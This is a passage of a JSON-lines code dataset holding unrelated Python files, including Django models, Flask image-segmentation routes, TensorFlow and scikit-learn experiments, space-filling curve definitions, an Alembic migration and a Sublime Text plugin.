collate_seq(seq_list):\n inputs, targets = zip(*seq_list)\n lens = [len(seq) for seq in inputs]\n seq_order = sorted(range(len(lens)), key=lens.__getitem__, reverse=True)\n inputs = [inputs[i] for i in seq_order]\n targets = [targets[i] for i in seq_order]\n return inputs, targets\n\n\nif __name__ == '__main__':\n data_path = \"./data/dev.npy\"\n transcripts_path = \"./data/dev_char.npy\"\n train_set = myDataset(data_path, transcripts_path)\n # for i in range(3):\n # sequence, targets = train_set.__getitem__(i)\n # print(sequence.shape) # seq_len * 40\n train_loader = DataLoader(train_set, shuffle=False, batch_size=4, collate_fn=collate_seq, num_workers=4)\n for step, (inputs, targets) in enumerate(train_loader):\n if step == 0:\n print(inputs[0].shape, inputs[1].shape)\n print(targets)\n\n\n\n","sub_path":"myDataset.py","file_name":"myDataset.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"275977550","text":"from django.db import models\nclass Service(models.Model):\n title=models.CharField(max_length=200, verbose_name='titulo')\n subtitle=models.CharField(max_length=200, verbose_name='subtitulo')\n content=models.TextField(verbose_name='contenido')\n image=models.ImageField(upload_to='services', verbose_name='imagen')\n created=models.DateTimeField(auto_now_add=True, verbose_name='fecha de creación')\n updated=models.DateTimeField(auto_now=True, verbose_name='fecha de modificación')\n def __str__(self):\n return self.title\n class Meta:\n verbose_name='servicio'\n verbose_name_plural='servicios'\n ordering=['-created']\n# Create your models 
here.\n","sub_path":"webempresa/services/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"106850762","text":"import time\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nimport Fashion_mnist_inference\nimport Fashion_mnist_train\n\n# 验证阶段\ndef evaluate(fashion_mnist):\n with tf.Graph().as_default() as g:\n x = tf.placeholder(tf.float32, [fashion_mnist.validation.num_examples, Fashion_mnist_inference.IMAGE_SIZE,\n Fashion_mnist_inference.IMAGE_SIZE, Fashion_mnist_inference.NUM_CHANNELS],\n name='x-input')\n y_ = tf.placeholder(tf.float32, [None, Fashion_mnist_inference.OUT_NODE], name='y-input')\n xs = fashion_mnist.validation.images\n reshaped_xs = np.reshape(xs, (fashion_mnist.validation.num_examples, Fashion_mnist_inference.IMAGE_SIZE,\n Fashion_mnist_inference.IMAGE_SIZE, Fashion_mnist_inference.NUM_CHANNELS))\n validate_feed = {x: reshaped_xs, y_: fashion_mnist.validation.labels}\n y = Fashion_mnist_inference.inference(x, 0, None)\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n variable_averages = tf.train.ExponentialMovingAverage(Fashion_mnist_train.MOVING_AVERAGE_DECAY)\n variables_to_restore = variable_averages.variables_to_restore()\n saver = tf.train.Saver(variables_to_restore)\n # 读取最后一次保存的权重文件来验证网络模型的分类性能\n with tf.Session() as sess:\n ckpt = tf.train.get_checkpoint_state(Fashion_mnist_train.MODEL_SAVE_PATH)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n global_step = ckpt.model_checkpoint_path.split('\\\\')[-1].split('-')[-1]\n accuracy_score = sess.run(accuracy, feed_dict=validate_feed)\n print(\"After %s training step(s), validation \"\n \"accuracy = %g\" % (global_step, accuracy_score))\n else:\n print('No checkpoint file found')\n return\n\n\ndef main(argv=None):\n fashion_mnist = input_data.read_data_sets(r\"Fashion-mnist-data\", one_hot=True)\n evaluate(fashion_mnist)\n\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"Fashion-mnist/Fashion_mnist_val.py","file_name":"Fashion_mnist_val.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"466845915","text":"import random\nimport string\n\nfrom os.path import split\nfrom flask import send_from_directory, send_file, request, json, after_this_request\nfrom app import app\nfrom app.process.segnet.segment import img_process\nfrom app.tools.dirs import save_upload, save_processed, get_original, get_segmented, save_processed_outlined, \\\n save_upload_outlined, create_zip, cleanup, allowed_file\nfrom app.process.outline import *\nfrom app.process.base64conversion import *\nfrom PIL import Image\n\n\n@app.route('/')\n@app.route('/home')\ndef index():\n return send_file('../dist/web/index.html', 'text/html')\n\n\n# delete img after processing\n@app.route('/segment', methods=['POST'])\ndef upload_file():\n b64_string = request.form['image']\n original_filename = request.form['fileName']\n\n serial_id = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))\n filename = serial_id + '.png'\n image = from_base64(b64_string)\n\n if allowed_file(original_filename):\n file_info = save_upload(image, filename)\n img_data = img_process(file_info[0])\n pro_img = save_processed(img_data, file_info[1])\n 
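# load the stored original image for this serial id so the response can return it alongside the segmented one\n 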
imgOriginal = get_original(serial_id)\n\n processed_base64 = to_base64(pro_img)\n original_base64 = to_base64(imgOriginal)\n return json.jsonify(segmentedImage=get_html(processed_base64), serialID=serial_id, originalImage=get_html(original_base64))\n else:\n return 'Incompatible File'\n\n\n@app.route('/outline', methods=['POST'])\ndef select_segment():\n seg_rgb = request.form['segmentColor']\n outline_color = request.form['outlineColor']\n outline_thickness = request.form['outlineThickness']\n outline_thickness_int = int(outline_thickness)\n serial_id = request.form['serialID']\n\n seg_image_path = get_segmented(serial_id)\n orig_image_path = get_original(serial_id)\n seg_img = Image.open(seg_image_path)\n img_outline = get_outline(seg_img, seg_rgb)\n orig_image = Image.open(orig_image_path)\n orig_image = paste_outline(orig_image, img_outline, outline_color, outline_thickness_int)\n seg_img = paste_outline(seg_img, img_outline, outline_color, outline_thickness_int)\n\n orig_f = split(orig_image_path)[1]\n outline_orig_img_path = save_upload_outlined(orig_f, orig_image)\n\n seg_f = split(seg_image_path)[1]\n outline_seg_img_path = save_processed_outlined(seg_f, seg_img)\n\n seg_img = get_html(to_base64(outline_seg_img_path))\n orig_image = get_html(to_base64(outline_orig_img_path))\n\n return json.jsonify(originalOutline=orig_image, segmentedOutline=seg_img)\n\n\n@app.route('/download', methods=['POST'])\ndef download():\n serial_id = request.form['serialID']\n orig = request.form['orig']\n orig_outline = request.form['origOutline']\n seg = request.form['seg']\n seg_outline = request.form['segOutline']\n\n zip_path = create_zip(serial_id, [orig, orig_outline, seg, seg_outline])\n\n @after_this_request\n def removal(response):\n cleanup(serial_id)\n return response\n\n return send_file(zip_path, attachment_filename=serial_id + '.zip')\n\n@app.route('/help', methods=['GET'])\ndef user_guide():\n return send_file('help.pdf' , as_attachment=True)\n\n@app.route('/')\ndef send_js(path):\n return send_from_directory('../dist/web', path)\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"313606295","text":"from peano.curves import Curve\nfrom peano.base_maps import BaseMap\n\n\n#\n# 2D curves\n#\n\ndef get_hilbert_curve():\n \"\"\"\n Example of fractal curve due to D.Hilbert.\n\n This curve has minimal known L_1 ratio (9).\n \"\"\"\n pattern = ('jiJ', ['ji','ij','ij','JI']) # chain code + bases\n return Curve.parse([pattern])\n\n\ndef get_peano_curve():\n \"\"\"First example of space-filling curve due to G.Peano.\"\"\"\n chain = 'jji' + 'JJi' + 'jj'\n bases = ['ij','Ij','ij', 'iJ','IJ','iJ', 'ij','Ij','ij']\n pattern = (chain, bases)\n return Curve.parse([pattern])\n\n\ndef get_scepin_bauman_curve():\n \"\"\"\n Minimal 3*3 Peano Curve by E.V. Shchepin and K.E. Bauman.\n\n Proceedings of the Steklov Institute of Mathematics, 2008, Vol. 263, pp. 
236--256.\n \"\"\"\n proto = ( # as in peano curve\n (0, 0), (0, 1), (0, 2),\n (1, 2), (1, 1), (1, 0),\n (2, 0), (2, 1), (2, 2),\n )\n base_maps = [\n BaseMap.id_map(dim=2),\n BaseMap.parse('jI'),\n BaseMap.parse('ji'),\n\n BaseMap.parse('iJ'),\n BaseMap.parse('JI'),\n BaseMap.parse('Ji'),\n\n BaseMap.id_map(dim=2),\n BaseMap.parse('jI'),\n BaseMap.parse('ji'),\n ]\n return Curve(dim=2, div=3, patterns=[(proto, base_maps)])\n\n\ndef get_peano5_curve():\n \"\"\"5-div analog of original Peano curve.\"\"\"\n id_map = BaseMap.id_map(2)\n x_map = BaseMap.parse('Ij')\n y_map = BaseMap.parse('iJ')\n xy_map = BaseMap.parse('IJ')\n proto = [\n (0, 0), (0, 1), (0, 2), (0, 3), (0, 4),\n (1, 4), (1, 3), (1, 2), (1, 1), (1, 0),\n (2, 0), (2, 1), (2, 2), (2, 3), (2, 4),\n (3, 4), (3, 3), (3, 2), (3, 1), (3, 0),\n (4, 0), (4, 1), (4, 2), (4, 3), (4, 4),\n ]\n base_maps = [\n id_map, x_map, id_map, x_map, id_map,\n y_map, xy_map, y_map, xy_map, y_map,\n id_map, x_map, id_map, x_map, id_map,\n y_map, xy_map, y_map, xy_map, y_map,\n id_map, x_map, id_map, x_map, id_map,\n ]\n return Curve(dim=2, div=5, patterns=[(proto, base_maps)])\n\n\ndef get_meurthe_curve():\n \"\"\"Meurthe curve, equivalent to Schepin-Bauman curve.\"\"\"\n pattern = ('jjiJJijj', ['ji','jI','ij','Ji','JI','iJ','ji','jI','ij'])\n return Curve.parse([pattern])\n\n \ndef get_coil_curve():\n \"\"\"Coil 2D 3-div curve, see Haverkort & Walderveen.\"\"\"\n pattern = ('jjiJJijj', ['ji','jI','ji','Ji','JI','Ji','ji','jI','ji'])\n return Curve.parse([pattern])\n\n\ndef get_serpentine_curve():\n \"\"\"Serpentine 2D 3-div curve, see Haverkort & Walderveen.\"\"\"\n pattern = ('jjiJJijj', ['ij','jI','ji','iJ','JI','iJ','ji','jI','ij'])\n return Curve.parse([pattern])\n\n\ndef get_r_curve():\n \"\"\"R-curve, 2D 3-div, see Haverkort & Walderveen.\"\"\"\n pattern = ('jjiiJIJi', ['ji','ji','ij','ij','ij','IJ','JI','JI','ij'])\n return Curve.parse([pattern])\n\n\ndef get_ye_curve():\n \"\"\"YE-curve: 5*5 monofractal with l2-ratio 5 43/73.\"\"\"\n chain = 'jiJijjIIjjiJijiiJIJiJIJi'\n bases = '0Ji~,0ij,0ij,0jI~,0Ji~,0Ji~,0Ji~,0IJ,0IJ,0Ji~,0ij,0ij,0jI~,0Ji~,0ij,0ij,0ij,0IJ,0jI~,0jI~,0ij,0IJ,0jI~,0jI~,0ij'\n return Curve.parse([(chain, bases)])\n\n\n# 2D polyfractals\n\ndef get_beta_omega_curve():\n \"\"\"\n Beta-Omega bifractal 2d curve, best polyfractal in l2\n\n See J.-M. 
Wierum, ``Definition of a New Circular Space-Filling Curve'',\n Technical report PC^2, 2002\n\n Realization from Haverkort & Walderveen,\n ``Locality and bounding-box quality of two-dimensional space-filling curves'',\n Comp.Geom and Appl, v.43 (2010)\n\n ratio: l2=5, l1=9, linf=5\n gates: omega: (0,1/3)->(1,1/3), beta: (0,1/3)->(2/3,0)\n \"\"\"\n omega_pattern = ('jiJ', ['1iJ','1jI','1ji~','1IJ~'])\n beta_pattern = ('jiJ', ['1iJ','1jI','1ji~','0Ji'])\n return Curve.parse([omega_pattern, beta_pattern])\n\n\ndef get_ARW_Curve():\n \"\"\"\n AR^2W^2 tetrafractal curve.\n\n See reference to Haverkort & Walderveen in get_beta_omega_curve doc\n \"\"\"\n r_pattern = ('i(Ij)i', ['3ij','1Ji~','2jI','1iJ']) # pnum=0\n f_pattern = ('jiJ', ['3ji','2Ij~','1ij','1JI']) # pnum=1\n p_pattern = ('jiJ', ['0ji','1jI','0Ji','1JI']) # pnum=2\n g_pattern = ('jiJ', ['0ij','2jI','0Ji','3jI~']) # pnum=3\n return Curve.parse([r_pattern, f_pattern, p_pattern, g_pattern])\n\n\n#\n# 3D curves\n#\n\ndef get_haverkort_curve_a26():\n \"\"\"\n 3D Haverkort A26 curve, best monofractal in linf.\n\n Monofractal curve with time reversal.\n \"An inventory of three-dimensional Hilbert space-filling curves\", Herman Haverkort\n https://arxiv.org/abs/1109.2323\n Curve A26.0010 1011.1011 0011, see p.10, p.15, p.18\n\n Properties:\n ratio: linf=12.4\n gate: (0,0,0)->(1,0,0)\n \"\"\"\n pattern = ('jkJijKJ', ['Jki~', 'Kij~', 'kij', 'IKJ~', 'iKJ', 'kIj~', 'KIj', 'JIk'])\n return Curve.parse([pattern])\n\n\ndef get_haverkort_curve_f():\n \"\"\"\n 3D Haverkort F curve, best known monofractal in l2\n\n Monofractal curve with time reversal,\n \"An inventory of three-dimensional Hilbert space-filling curves\", Herman Haverkort\n https://arxiv.org/abs/1109.2323\n Curve F, see p.13, p.15, p.18\n\n Properties:\n ratio: l1=89.8, l2=18.6 (best known!)\n gate: (0,1/3,1/3)->(2/3,1/3,0)\n \"\"\"\n pattern = ('jkJijKJ', ['iKJ','jIK','jIk~','JkI','Jki~','jik','jiK~','kiJ~'])\n return Curve.parse([pattern])\n\n\ndef get_tokarev_curve():\n \"\"\"\n 3D monofractal curve defined by Tokarev.\n\n Definition is taken from Haverkort's inventory,\n Curve A26.0000 0000.0000 0000 (page 9, Fig.5(b))\n \"\"\"\n p0 = ('jkJijKJ', ['jki','kij','kij','iJK','iJK','KIj','KIj','JkI'])\n return Curve.parse([p0])\n\n\n# 3D polyfractals\n\ndef get_neptunus_curve():\n \"\"\"\n 3D bifractal Neptunus curve, best in linf (9.45)\n\n \"An inventory of three-dimensional Hilbert space-filling curves\", Herman Haverkort\n https://arxiv.org/abs/1109.2323\n p.16\n\n Properties:\n ratio: linf=9.45, best in class of poly-Hilbert curves\n gates: (0,0,0)->(1,0,0), (0,0,0)->(1,1,1)\n \"\"\"\n p0 = ('jkJijKJ', ['1ijk','0jIK','1kJI','1JiK','1ijk','1jKI','1KJi','0JIk'])\n p1 = ('jkJiKjk', ['1ijk','0jIK','1kJI','1JiK','0ijk','1KjI','1jki','0kIJ'])\n return Curve.parse([p0, p1])\n\n\ndef get_luna_curve():\n \"\"\"\n 3D bifractal Luna curve\n\n Inventory ref, p.16\n\n gates: (0,0,0)->(1,0,0), (0,0,0)->(1,1,1)\n \"\"\"\n p0 = ('jkJijKJ', ['1kji','0jIK','1JIk','1iKJ','1ijk','1jKI','0JiK','1KiJ'])\n p1 = ('jkJiKjk', ['1kji','0jIK','1JIk','1iKJ','0ijk','1KjI','0kij','1jik'])\n return Curve.parse([p0, p1])\n\n\ndef get_17_curve():\n \"\"\"\n 3D bifractal facet-gated curve with l2-ratio <17\n \"\"\"\n p0 = ('jikIJiK', '1KIJ~,0KIj,1kji,0Jki~,1JkI,0kIJ,1KJi,1JiK')\n p1 = ('jkJijKJ', '1KIJ~,0ijK~,0Ikj~,0KJI~,0kiJ~,0Ijk~,0IjK,1iKJ')\n return Curve.parse([p0, 
p1])\n","sub_path":"tests/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":6723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"502364006","text":"\"\"\"edit\n\nRevision ID: 1d734133b89b\nRevises: 2e1bc726e847\nCreate Date: 2015-06-06 16:58:17.129689\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1d734133b89b'\ndown_revision = '2e1bc726e847'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('question_comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('body', sa.Text(), nullable=True),\n sa.Column('body_html', sa.Text(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('is_active', sa.Boolean(), nullable=True),\n sa.Column('likes', sa.Integer(), nullable=True),\n sa.Column('question_id', sa.Integer(), nullable=True),\n sa.Column('author_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),\n sa.ForeignKeyConstraint(['question_id'], ['questions.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_question_comments_timestamp'), 'question_comments', ['timestamp'], unique=False)\n op.create_table('answer_comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('body', sa.Text(), nullable=True),\n sa.Column('body_html', sa.Text(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('is_active', sa.Boolean(), nullable=True),\n sa.Column('likes', sa.Integer(), nullable=True),\n sa.Column('answer_id', sa.Integer(), nullable=True),\n sa.Column('author_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['answer_id'], ['answers.id'], ),\n sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_answer_comments_timestamp'), 'answer_comments', ['timestamp'], unique=False)\n op.drop_table('comments')\n op.create_foreign_key(None, 'answers', 'users', ['author_id'], ['id'])\n op.create_foreign_key(None, 'answers', 'questions', ['question_id'], ['id'])\n op.create_foreign_key(None, 'follows', 'users', ['follower_id'], ['id'])\n op.create_foreign_key(None, 'follows', 'users', ['followed_id'], ['id'])\n op.create_foreign_key(None, 'questions', 'users', ['author_id'], ['id'])\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, 'questions', type_='foreignkey')\n op.drop_constraint(None, 'follows', type_='foreignkey')\n op.drop_constraint(None, 'follows', type_='foreignkey')\n op.drop_constraint(None, 'answers', type_='foreignkey')\n op.drop_constraint(None, 'answers', type_='foreignkey')\n op.create_table('comments',\n sa.Column('id', mysql.INTEGER(display_width=11), nullable=False),\n sa.Column('body', mysql.TEXT(), nullable=True),\n sa.Column('body_html', mysql.TEXT(), nullable=True),\n sa.Column('timestamp', mysql.DATETIME(), nullable=True),\n sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True),\n sa.Column('likes', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('author_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('answer_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.Column('question_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id'),\n mysql_default_charset=u'latin1',\n mysql_engine=u'MyISAM'\n )\n op.drop_index(op.f('ix_answer_comments_timestamp'), table_name='answer_comments')\n op.drop_table('answer_comments')\n op.drop_index(op.f('ix_question_comments_timestamp'), table_name='question_comments')\n op.drop_table('question_comments')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/1d734133b89b_edit.py","file_name":"1d734133b89b_edit.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"577255328","text":"from django import template\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core import urlresolvers\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef edit_link(object):\n content_type = ContentType.objects.get_for_model(object)\n admin_name = content_type.app_label + '_' + content_type.model + '_change'\n url = urlresolvers.reverse('admin:' + admin_name, args=(1, ))\n return url\n","sub_path":"apps/admin_edit_tag/templatetags/admin_edit_tag.py","file_name":"admin_edit_tag.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"382092815","text":"from sklearn import preprocessing\nimport pandas as pd\nfrom base_util import * \nfrom base_models import * \n\n\n############\n# Prueba EjemploSimpleReducción\ndevice='cpu'\npruebas='broma'\nrutaDataset=\"\"\n\n\nif pruebas=='broma':\n print(\"Dataset de broma\")\n print(\"----------------\")\n \n #Parametros generales del modelo\n tipoProblema='clasificacion' \n normalizaAtrib = True\n\n #Crea Dataset\n Xc=np.array([[1,2,3],[4,5,6],[7,8,9],[1,2,3],[4,5,6]])\n Xi=np.array([[1,np.NaN,3],[4,np.NaN,6],[7,8,9],[1,2,3],[4,5,6]])\n\n \n y=np.array([0.,1,2,0,2])\n\n df_Xi=pd.DataFrame(Xi,columns=[\"A1\",\"A2\",\"A3\"],index=[\"O1\",\"O2\",\"O3\",\"O4\",\"O5\"])\n df_Xc=pd.DataFrame(Xc,columns=[\"A1\",\"A2\",\"A3\"],index=[\"O1\",\"O2\",\"O3\",\"O4\",\"O5\"])\n df_y=pd.DataFrame(y)\n\n #Crea un tensor con las clases y el peso para cada una\n clases, repClases = np.unique(df_Xc.values,return_counts=True)\n pesosClases1 = torch.FloatTensor(repClases[~np.isnan(clases)].sum()/repClases[~np.isnan(clases)])\n pesosClases2 = torch.FloatTensor(max(repClases[~np.isnan(clases)])/repClases[~np.isnan(clases)])\n clases = torch.FloatTensor(clases[~np.isnan(clases)]).to(dtype=int)\n maxClases = 
clases.max().item()\n \n # Escalamos la informacion\n if normalizaAtrib:\n if tipoProblema=='regresion': \n df_Xi_s, df_Xc_s, scaler = escala(df_Xi,df_Xc, normalizaAtrib, scaler=None)\n else:\n scaler=None\n df_Xi_s = df_Xi/maxClases\n df_Xc_s = df_Xc/maxClases\n else:\n df_Xi_s = df_Xi\n df_Xc_s = df_Xc\n\n\n \n #Definimos los parametros del grafo y llamamos a la funcion que lo crea.\n muestras, dimEntNodo = df_Xi.shape\n\n #Creamos las distintas capas del modelo\n dimEntArco=1\n dimEmbArco = dimEmbNodo = 10\n modoArcos=1\n modelosCapas=['EGSAGE','EGSAGE','EGSAGE']\n dropout=0.\n selActivacion='relu'\n concat_states= False\n nodo_hidden_dims = [10]\n normalizarEmb = [True, True, True]\n fAggr = 'mean'\n\n modeloGNN = GNNStack(dimEntNodo, # Atributos de nodo = Dimension del embeding del nodo = Atrib. de cada observacion\n dimEntArco, # Atributos de arco = Dimension del embeding del arco = 1\n dimEmbNodo, # La dimension del embeding de nodo a la salida de red(ej: 64)\n dimEmbArco, # La dimension del embeding de arco a la salida de red(ej: 64)\n modoArcos, # Determina como se opera con los arcos (default=1)\n modelosCapas, # Tipo de layer. En nuestro caso EGSAGE (hay mas tipos disponibles)\n dropout, # Dropout de la MLP que actualiza el embedding de los nodos.\n selActivacion, # Funcion de activacion que usamos (ej: relu)\n concat_states, # T o F. Indica si se concatenan los embeddings de cada layer \n nodo_hidden_dims, # Capas ocultas de MLP que actualiza el embedding de los nodos.\n normalizarEmb, # Lista bool. indicando si en una capa se normaliza embedding o no.\n fAggr).to(device) # Funcion de agregación (mean, sum, max...))\n\n \n # Esta red neuronal asigna valores a los arcos\n # Es la capa de tarea de la red.\n input_dim = dimEmbNodo * 2\n if tipoProblema=='regresion':\n output_dim = 1\n else:\n output_dim = len(clases)\n impute_hiddens= nodo_hidden_dims\n impute_activation='relu'\n impute_model = MLPNet(input_dim, output_dim,\n hidden_layer_sizes=impute_hiddens,\n hidden_activation=impute_activation,\n dropout=dropout).to(device)\n\n \n # Entrenamos el modelo y probamos el entrenamiento por batches\n if tipoProblema == 'regresion':\n funcPerdida = F.mse_loss\n else:\n funcPerdida = nn.CrossEntropyLoss(weight=pesosClases2.to(device)) #F.cross_entropy\n trocea = 1\n epochs = 5000\n known = 0.7 #Probabilidad de conocer el valor del atributo del arco (rdrop=1-known)\n opt=None\n best_loss=None\n \n print(\"Comienza entrenamiento \",epochs,\" epochs\\n\")\n \n data = crea_datos(df_Xi_s, df_Xc_s, df_y, 0)\n modeloGNN,inpute_model,opt,best_loss = entrenaRed(data, modeloGNN, impute_model, epochs, known, device, opt, normalizaAtrib, tipoProblema, funcPerdida, clases, best_loss)\n \n print (\"Fin entrenamiento---------------------\\n\")\n \n ##################\n # Probamos modelo\n ##################\n \n data1 = crea_datos(df_Xi_s, df_Xc_s, df_y, 0)\n\n # Prueba 1. 
Reconstruye matriz con valores vistos en el entrenamiento.\n #######\n print(\"\\nPrueba1- Resuelve el modelo entrenado\")\n print(\"===============================================\")\n \n imputaNaN1 = imputaValores(data1, modeloGNN, impute_model, device, tipoProblema, clases, normalizaAtrib)\n \n\n print(\"Matriz original\")\n print(df_Xc)\n print(\"Matriz con valores perdidos\")\n print(df_Xi)\n\n df_Xr = reconstruyeMatrizIncompleta(data1.df_Xi, imputaNaN1)\n \n if normalizaAtrib and tipoProblema==\"regresion\":\n print(\"\\nReconstruido\")\n print(scaler.inverse_transform(df_Xr))\n else:\n print(\"\\nReconstruido\")\n print(df_Xr * maxClases)\n _ =testRed(data1.test_labels, imputaNaN1, tipoProblema)\n","sub_path":"tfm_0_EjemploSimple.py","file_name":"tfm_0_EjemploSimple.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"194322159","text":"\"\"\"\n==========================\nPlotting Validation Curves\n==========================\n\nIn this plot you can see the training scores and validation scores of an SVM\nfor different values of the kernel parameter gamma. For very low values of\ngamma, you can see that both the training score and the validation score are\nlow. This is called underfitting. Medium values of gamma will result in high\nvalues for both scores, i.e. the classifier is performing fairly well. If gamma\nis too high, the classifier will overfit, which means that the training score\nis good but the validation score is poor.\n\"\"\"\nprint(__doc__)\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.svm import SVC\nfrom sklearn.learning_curve import validation_curve\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cross_validation import StratifiedShuffleSplit\n\nimport os\n\ndef get_path(rel_path):\n script_dir = os.path.dirname(__file__) #absolute dir the script is in\n abs_file_path = os.path.join(script_dir, rel_path)\n \n return abs_file_path\n\n#digits = load_digits()\n#X, y = digits.data, digits.target\n\ntrain_df = pd.read_csv(get_path(\"../../../../credit/credit_train.csv\"))\ntest_df = pd.read_csv(get_path(\"../../../../credit/credit_test.csv\"))\n\n# convert the \"DEFAULT\" label column to numpy arrays\ntrain_Y = train_df.pop('DEFAULT').values\ntrain_X = train_df.values\ntest_Y = test_df.pop('DEFAULT').values\ntest_X = test_df.values\n\n# Standardize \nscaler = StandardScaler()\ntest_X = scaler.fit_transform(test_X)\ntrain_X = scaler.fit_transform(train_X)\n\ncv = StratifiedShuffleSplit(test_Y, n_iter=1, test_size=0.2, random_state=42)\nbest_C = 1;\n\nparam_range = np.logspace(-2, 0, 3)\ntrain_scores, test_scores = validation_curve(\n SVC(C=best_C), test_X, test_Y, param_name=\"gamma\", param_range=param_range,\n cv=cv, scoring=\"accuracy\", n_jobs=-1)\n \ntrain_scores_mean = np.mean(train_scores, axis=1)\ntrain_scores_std = np.std(train_scores, axis=1)\ntest_scores_mean = np.mean(test_scores, axis=1)\ntest_scores_std = np.std(test_scores, axis=1)\n\nplt.title(\"Model Complexity Curve. Credit. 
RBF Kernel\")\nplt.xlabel(\"$\\gamma$\")\nplt.ylabel(\"Score\")\nplt.ylim(0.0, 1.0)\nplt.semilogx(param_range, train_scores_mean, label=\"Training score\", color=\"r\")\nplt.fill_between(param_range, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.2, color=\"r\")\nplt.semilogx(param_range, test_scores_mean, label=\"Cross-validation score\",\n color=\"g\")\nplt.fill_between(param_range, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.2, color=\"g\")\nplt.legend(loc=\"best\")\nplt.show()\n","sub_path":"svm/rbf/credit/complexity_curve_credit_rbf.py","file_name":"complexity_curve_credit_rbf.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"285072148","text":"import sublime, sublime_plugin, User.sublime_util as su\n\nclass EncloseInQuotesCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n _enclose(\"quotes\", self.view, edit)\n\nclass InsertQuotesCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n _insert(\"quotes\", self.view, edit)\n\nclass EncloseInParenthesesCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n _enclose(\"parentheses\", self.view, edit)\n\nclass InsertParenthesesCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n _insert(\"parentheses\", self.view, edit)\n\ndef _enclose(_type, v, edit):\n if any(rg.empty() for rg in v.sel()):\n v.window().run_command(\"find_under_expand\")\n a = sublime.load_settings(\"Preferences.sublime-settings\").get(_type)\n for rg in v.sel():\n if rg.empty(): continue\n s = v.substr(rg)\n curr = s[0] + s[-1]\n ix = a.index(curr) if curr in a else None\n if ix == None:\n new_s = a[0][0] + s + a[0][1]\n elif ix == len(a) - 1:\n new_s = s[1:-1]\n else:\n new_s = a[ix + 1][0] + s[1:-1] + a[ix + 1][1]\n v.replace(edit, rg, new_s)\n\ndef _insert(_type, v, edit):\n a = sublime.load_settings(\"Preferences.sublime-settings\").get(_type)\n new_sel = []\n for rg in v.sel():\n if not rg.empty():\n new_sel.append(rg)\n continue\n curr = v.substr(sublime.Region(rg.a - 1, rg.a + 1))\n ix = a.index(curr) if curr in a else None\n if ix == None:\n v.replace(edit, sublime.Region(rg.a, rg.a), a[0])\n new_sel.append(sublime.Region(rg.a + 1, rg.a + 1))\n elif ix == len(a) - 1:\n v.replace(edit, sublime.Region(rg.a - 1, rg.a + 1), \"\")\n new_sel.append(sublime.Region(rg.a - 1, rg.a - 1))\n else:\n v.replace(edit, sublime.Region(rg.a - 1, rg.a + 1), a[ix + 1])\n new_sel.append(sublime.Region(rg.a, rg.a))\n v.set_selection(new_sel)\n","sub_path":"Packages/User/quotes_and_parentheses.py","file_name":"quotes_and_parentheses.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605807236","text":"# 